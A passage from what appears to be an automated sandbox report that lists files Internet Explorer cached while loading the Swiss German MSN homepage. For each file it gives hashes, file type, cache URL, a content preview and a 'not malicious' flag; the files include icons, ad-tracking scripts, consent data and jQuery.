                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):444
                                                                                                                                                                                            Entropy (8bit):7.25373742182796
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6:6v/lhPkR/CnFFDDRHbMgYjEr710UbCO8j+qom62fke5YCsd8sKCW5biVp:6v/78/kFFlcjEN0sCoqoX4ke5V6D+bi7
                                                                                                                                                                                            MD5:D02BB2168E72B702ECDD93BF868B4190
                                                                                                                                                                                            SHA1:9FB22D0AB1AAA390E0AFF5B721013E706D731BF3
                                                                                                                                                                                            SHA-256:D2750B6BEE5D9BA31AFC66126EECB39099EF6C7E619DB72775B3E0E2C8C64A6F
                                                                                                                                                                                            SHA-512:6A801305D1D1E8448EEB62BC7062E6ED7297000070CA626FC32F5E0A3B8C093472BE72654C3552DA2648D8A491568376F3F2AC4EA0135529C96482ECF2B2FD35
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                            Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....QIDAT8O....DA.....F...md5"...R%6.].@.............D.....Q...}s.0...~.7svv.......;.%..\.....]...LK$...!.u....3.M.+.U..a..~O......O.XR=.s.../....I....l.=9$...........~A.,. ..<...Yq.9.8...I.&.....V. ..M.\..V6.....O.........!y:p.9..l......"9.....9.7.N.o^[..d......]g.%..L.1...B.1k....k....v#._.w/...w...h..\....W...../..S.`.f.......IEND.B`.
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\BBK9Ri5[1].png
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):527
                                                                                                                                                                                            Entropy (8bit):7.3239256100568495
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:6v/78/W/6T+siLF44aPcb1z4+uzUomyawaTcQwvJ4MWX9w:U/6q4PU5Wmy0G4MKi
                                                                                                                                                                                            MD5:3C1367514C52C7FA2A6B2322096AA4C1
                                                                                                                                                                                            SHA1:25104E643189C1457A3916E38D7500A48FEEC77C
                                                                                                                                                                                            SHA-256:6FAD7471DE7E6CD862193B98452DED4E71F617CDC241AFBCF372235B89F925CC
                                                                                                                                                                                            SHA-512:1EB9B1C27025B4A629D056FDE061FC61ACB7A671ACB82BDC4B1354D7C50D4E02D34F520468F26BA060C3F9239C398D23834FF976CFFA12C4CEE3DB747C366D2A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBK9Ri5.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                            Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.S.K.A........ i..r0.\\.....hkkq..1h.[s..%.Fu. h)..B...].w.....8...{~...U *Q.....y.$.g...BM....EZi....j.F.c..e5.+...w;T.......<p.......".:$[8....P..*dH...$.......GO%qC.X..`MB.....!.....XcP338.>Q@3.S..y..NP..../|...f..[..r...F...9...N..S..0Q..m.<.^...>..l...A...6.}....:....^..P...5R...@:U....hN.8.....>....L~.T.&?S.X...0.m.C.,X..A%......X..!.m1.)T..O.*...'.....@.{.]....hF...,..FIY.y%M?;.u....8K6..../Bi|..?C.....IEND.B`.
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\BBX2afX[1].png
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):688
                                                                                                                                                                                            Entropy (8bit):7.578207563914851
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:6v/74//aaICzkSOms9aEx1Jt+9YKLg+b3OI21P7qO1uCqbyldNEiA67:BPObXRc6AjOI21Pf1dNCg
                                                                                                                                                                                            MD5:09A4FCF1442AD182D5E707FEBC1A665F
                                                                                                                                                                                            SHA1:34491D02888B36F88365639EE0458EDB0A4EC3AC
                                                                                                                                                                                            SHA-256:BE265513903C278F9C6E1EB9E4158FA7837A2ABAC6A75ECBE9D16F918C12B536
                                                                                                                                                                                            SHA-512:2A8FA8652CB92BBA624478662BC7462D4EA8500FA36FE5E77CBD50AC6BD0F635AA68988C0E646FEDC39428C19715DCD254E241EB18A184679C3A152030FD9FF8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                            Preview: .PNG........IHDR................U....sRGB.........gAMA......a.....pHYs..........o.d...EIDATHK.Mh.A......4.....b.Zoz....z.".....A../.X.../........"(*.A.(.qPAK/......I.Yw3...M...z./...7..}o...~u'...K_...YM...5w1b....y.V.|.-e.i..D...[V.J...C......R.QH.....:....U.....].$]LE3.}........r..#.]...MS.....S..#..t1...Y...g........ 8."m......Q..>,.?S..{.(7.....;..I.w...?MZ..>.......7z.=.@.q@.;.U..~....:.[.Z+3UL#.........G+3.=.V."D7...r/K.._..LxY.....E..$..{. sj.D...&.......{.rYU..~G....F3..E...{. ......S....A.Z.f<=.....'.1ve.2}[.....C....h&....r.O..c....u... .N_.S.Y.Q~.?..0.M.L..P.#...b..&..5.Z....r.Q.zM'<...+.X3..Tgf._...+SS...u........*./.....IEND.B`.
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\BBnYSFZ[1].png
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):560
                                                                                                                                                                                            Entropy (8bit):7.425950711006173
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:6v/78/+m8H/Ji+Vncvt7xBkVqZ5F8FFl4hzuegQZ+26gkalFUx:6H/xVA7BkQZL8OhzueD+ikalY
                                                                                                                                                                                            MD5:CA188779452FF7790C6D312829EEE284
                                                                                                                                                                                            SHA1:076DF7DE6D49A434BBCB5D88B88468255A739F53
                                                                                                                                                                                            SHA-256:D30AB7B54AA074DE5E221FE11531FD7528D9EEEAA870A3551F36CB652821292F
                                                                                                                                                                                            SHA-512:2CA81A25769BFB642A0BFAB8F473C034BFD122C4A44E5452D79EC9DC9E483869256500E266CE26302810690374BF36E838511C38F5A36A2BF71ACF5445AA2436
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                            Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8O.S.KbQ..zf.j...?@...........J.......z..EA3P....AH...Y..3......|6.6}......{..n. ...b..........".h4b.z.&.p8`...:..Lc....*u:......D...i$.)..pL.^..dB.T....#.f3...8.N.b1.B!.\...n..a...a.Z........J%.x<....|..b.h4.`0.EQP.. v.q....f.9.H`8..\...j.N&...X,2...<.B.v[.(.NS6..|>..n4...2.57.*.......f.Q&.a-..v..z..{P.V......>k.J...ri..,.W.+.......5:.W.t...i.....g....\.t..8.w...:......0....%~...F.F.o".'rx...b..vp....b.l.Pa.W.r..aK..9&...>.5...`..'W......IEND.B`.
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\checksync[1].htm
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):20647
                                                                                                                                                                                            Entropy (8bit):5.298022472526033
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:kBAGm6ElzD7XzeMk/lg2f5vzBgF3OZORQWwY4RXrqt:aEJDnci2RmF3OsRQWwY4RXrqt
                                                                                                                                                                                            MD5:D2D03379B82167FDE4D9C70ADDDE846E
                                                                                                                                                                                            SHA1:F92EFA33EFC6F05671F08130D1577C9C9FCBEFBF
                                                                                                                                                                                            SHA-256:E1F402FE6FEF2C6E668EF95F04F5F3F627A9D8147D8D405F55FA22858D2EAE83
                                                                                                                                                                                            SHA-512:BCD97205EF412123C8E9B597DA3A3890D5C591741169BAF76B1397F5927451CA93E4A9F991E91C5CC9236B6B784CDBBBF341A1CA6C29DEBF2DF719DD338BDA23
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":72,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\checksync[2].htm
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):20647
                                                                                                                                                                                            Entropy (8bit):5.298022472526033
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:kBAGm6ElzD7XzeMk/lg2f5vzBgF3OZORQWwY4RXrqt:aEJDnci2RmF3OsRQWwY4RXrqt
                                                                                                                                                                                            MD5:D2D03379B82167FDE4D9C70ADDDE846E
                                                                                                                                                                                            SHA1:F92EFA33EFC6F05671F08130D1577C9C9FCBEFBF
                                                                                                                                                                                            SHA-256:E1F402FE6FEF2C6E668EF95F04F5F3F627A9D8147D8D405F55FA22858D2EAE83
                                                                                                                                                                                            SHA-512:BCD97205EF412123C8E9B597DA3A3890D5C591741169BAF76B1397F5927451CA93E4A9F991E91C5CC9236B6B784CDBBBF341A1CA6C29DEBF2DF719DD338BDA23
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":72,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\de-ch[1].htm
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):424103
                                                                                                                                                                                            Entropy (8bit):5.435897559507679
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:Mf1JUHxx+WEiwHIJxleS7UTVpVzu27HACdlKmKKzBzMfKFC1tfbLG:Mf1MOWLSx7HAU8mKyzMltfG
                                                                                                                                                                                            MD5:00985021A002EA56632D65773E1F7BA9
                                                                                                                                                                                            SHA1:EDD51D118E845AB974406D4FEDBCF8C4B785D3DB
                                                                                                                                                                                            SHA-256:BFBEACC27E7D6C458F363884617A098F017FB7C3B9A087F8AD65225C02BA5DF6
                                                                                                                                                                                            SHA-512:CD4DEE345AB8592487F15FC33E38FE2F65C28095BE21A3B59642F688F84C06D6655306C63CABDDB885822F44C5B21D5C8AF0B85B8D08737B4AFDE1B644703B39
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: <!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20201216_29807887;a:6669b3d2-3194-4ed2-9574-3f916a841229;cn:19;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 19, sn: neurope-prod-hp, dt: 2020-12-17T21:55:04.3427197Z, bt: 2020-12-17T01:18:28.2032433Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2020-12-08 13:46:15Z;xdmap:2020-12-18 13:12:43Z;axd:;f:gholdout;userOptOut:false;userOptOutOptions:" data-js="{&quot;dpi&quot;:1.0,&quot;ddpi&quot;:1.0,&quot;dpio&quot;:null,&quot;forcedpi&quot;:null,&quot;dms&quot;:6000,&quot;ps&quot;:1000,&quot;bds&quot;:7,&quot;dg&quot;:&quot;tmx.pc.ms.ie10plus&quot;,&quot;ssl&quot;:true,&quot;moduleapi&quot;:&quot;https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;,&quot;cdnmoduleapi&quot;:&quot;https://static-global-s-msn-com.akamaiz
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\de-ch[1].json
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):78451
                                                                                                                                                                                            Entropy (8bit):5.363992239728574
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:hlAyi1IXQu+IE6VyKzxLx1wSICUSk4B1C04JLtJQLNEWE9+CPm7DIUYU5Jfoc:hlLQMFxaACNWit9+Ym7Mkz
                                                                                                                                                                                            MD5:88AB3FC46E18B4306809589399DA1B04
                                                                                                                                                                                            SHA1:009F623B8879A08A0BDD08A0266E138C500D52DB
                                                                                                                                                                                            SHA-256:4D4DF96DDF04BBC6255DFF587A1543B26FC23E0B825DEC33576E61B041C3973A
                                                                                                                                                                                            SHA-512:B01BB16FA1C04B2734B0B6AEE6B1FAFE914F95B21122D2480E09284B038BD966F831C4AA42C031FE5FC51718E1997F779FC6EBCD428DB943E050F362C10F4B29
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/de-ch.json
                                                                                                                                                                                            Preview: {"DomainData":{"cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAllText":"Einstellungen speichern","CookiesUsedText":"Verwendete Cookies","AboutLink":"https://go.microsoft.com/fwlink/?LinkId=5
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\errorPageStrings[1]
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4720
                                                                                                                                                                                            Entropy (8bit):5.164796203267696
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                                            MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                                            SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                                            SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                                            SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\iab2Data[1].json
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):180232
                                                                                                                                                                                            Entropy (8bit):5.115010741936028
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:l3JqIWlR2TryukPPnLLuAlGpWAowa8A5NbNQ8nYHv:l3JqIcATDELLxGpEw7Aq8YP
                                                                                                                                                                                            MD5:EC3D53697497B516D3A5764E2C2D2355
                                                                                                                                                                                            SHA1:0CDA0F66188EBF363F945341A4F3AA2E6CFE78D3
                                                                                                                                                                                            SHA-256:2ABD991DABD5977796DB6AE4D44BD600768062D69EE192A4AF2ACB038E13D843
                                                                                                                                                                                            SHA-512:CC35834574EF3062CCE45792F9755F1FB4B63DDD399A5B44C40555D191411F0B8924E5C2FEFCD08BAC69E1E6D6275E121CABB4A84005288A7452922F94BE5658
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json
                                                                                                                                                                                            Preview: {"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\jquery-2.1.1.min[1].js
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):84249
                                                                                                                                                                                            Entropy (8bit):5.369991369254365
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
                                                                                                                                                                                            MD5:9A094379D98C6458D480AD5A51C4AA27
                                                                                                                                                                                            SHA1:3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
                                                                                                                                                                                            SHA-256:B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
                                                                                                                                                                                            SHA-512:4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquery-2.1.1.min.js
                                                                                                                                                                                            Preview: /*! jQuery v2.1.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\nrrV9640[1].js
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):92100
                                                                                                                                                                                            Entropy (8bit):5.417596340714003
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:Ght5EFuQkZu/ePhBbO8IxZ0FmxcK+uLJXsD0voBZeTFuQNgKCpLf4LfcVFS:GhoghBbxEEuLSkoLeTNCw
                                                                                                                                                                                            MD5:E80C4BBAA75CA8F641761F84964B5D96
                                                                                                                                                                                            SHA1:669BF4ED2784B3171E6964D94526CC617721F3AC
                                                                                                                                                                                            SHA-256:C7DE27EA492EC88B5B9BDEC59A0BDDA82A4A567C9C85EDB1CBC51F415AA8ECF7
                                                                                                                                                                                            SHA-512:8301563CB503C0639205558CCC42D4DFF072C2CCFC053590776197215856574FE9F6941D0EA30ED08D8B4FAB1005E2E61F96D6D62612B5E7B2BE01C585A7BB40
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://contextual.media.net/48/nrrV9640.js
                                                                                                                                                                                            Preview: var _mNRequire,_mNDefine;!function(){"use strict";function n(n){return"[object Array]"===Object.prototype.toString.call(n)}function e(n){return void 0!==n&&""!==n&&null!==n}function t(n){return"function"==typeof n}function r(r,i,o){return t(i)&&(o=i,i=[]),!!(e(r)&&n(i)&&t(o))&&void(u[r]={deps:i,callback:o})}function i(n,e){var r,c=[];for(var f in n)if(n.hasOwnProperty(f)){if(r=n[f],"object"==typeof r||"undefined"==typeof r){c.push(r);continue}void 0!==o[r]?c.push(o[r]):(o[r]=i(u[r].deps,u[r].callback),c.push(o[r]))}return t(e)?e.apply(this,c):c}var o={},u={};_mNRequire=i,_mNDefine=r}();_mNDefine("modulefactory",[],function(){"use strict";function r(r){var e=!0,o={};try{o=_mNRequire([r])[0]}catch(i){e=!1}return o.isResolved=function(){return e},o}function e(){o=r("conversionpixelcontroller"),i=r("browserhinter"),n=r("kwdClickTargetModifier"),t=r("hover"),a=r("mraidDelayedLogging"),c=r("macrokeywords"),d=r("tcfdatamanager")}var o={},i={},n={},t={},a={},c={},d={};return e(),{conversionPix
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\85-0f8009-68ddb2ab[1].js
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):391439
                                                                                                                                                                                            Entropy (8bit):5.3267864484728475
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:Rr/vd/bHSg/1xeMqkhmnid3WGqIjHSjaeriSZZNZvgxO0Dvq4FcG6Ix2K:F1/bAznid3WGqIjHdAEtHcGB3
                                                                                                                                                                                            MD5:0D7EB9C0E03CC047264A7C1EAA0ED3FD
                                                                                                                                                                                            SHA1:1D8CAECD85059D4606223FE4A2001C4C8AE3E6A6
                                                                                                                                                                                            SHA-256:798524F88099E84B028708979684286904005DD5DBD6F260BDC12C502C446FE3
                                                                                                                                                                                            SHA-512:87AEF87FB1A1D69720254D3A595B15DCB85C7D81AE73911C4772262A7FBCEE8A113A707C03F675347565201D931EA990234C9F2483D6D82CAAA7DB2C2AECE44C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-35b5e437/direction=ltr.locales=de-ch.themes=start.dpi=resolution1x/97-9a8c47-68ddb2ab/e1-68c139-9c061e74/b7-1efba2-4d1c778a/e4-0588d3-68ddb2ab/64-4c5ce6-dd1c81bc/9e-a7a255-68ddb2ab/a9-ac9b58-68ddb2ab/f1-d0c6aa-cae48929/c7-47822a-4345ec2c/6d-514ef6-f6a4366a/d2-05c949-243aa040/5e-c51c87-d63b7450/df-6c8e66-68ddb2ab/7d-561863-1296bc60/9e-639daf-68ddb2ab/85-0f8009-68ddb2ab?ver=20201216_29807887&fdhead=gholdout&ocid=iehp&csopd=20201123234311&csopdb=20201204234342
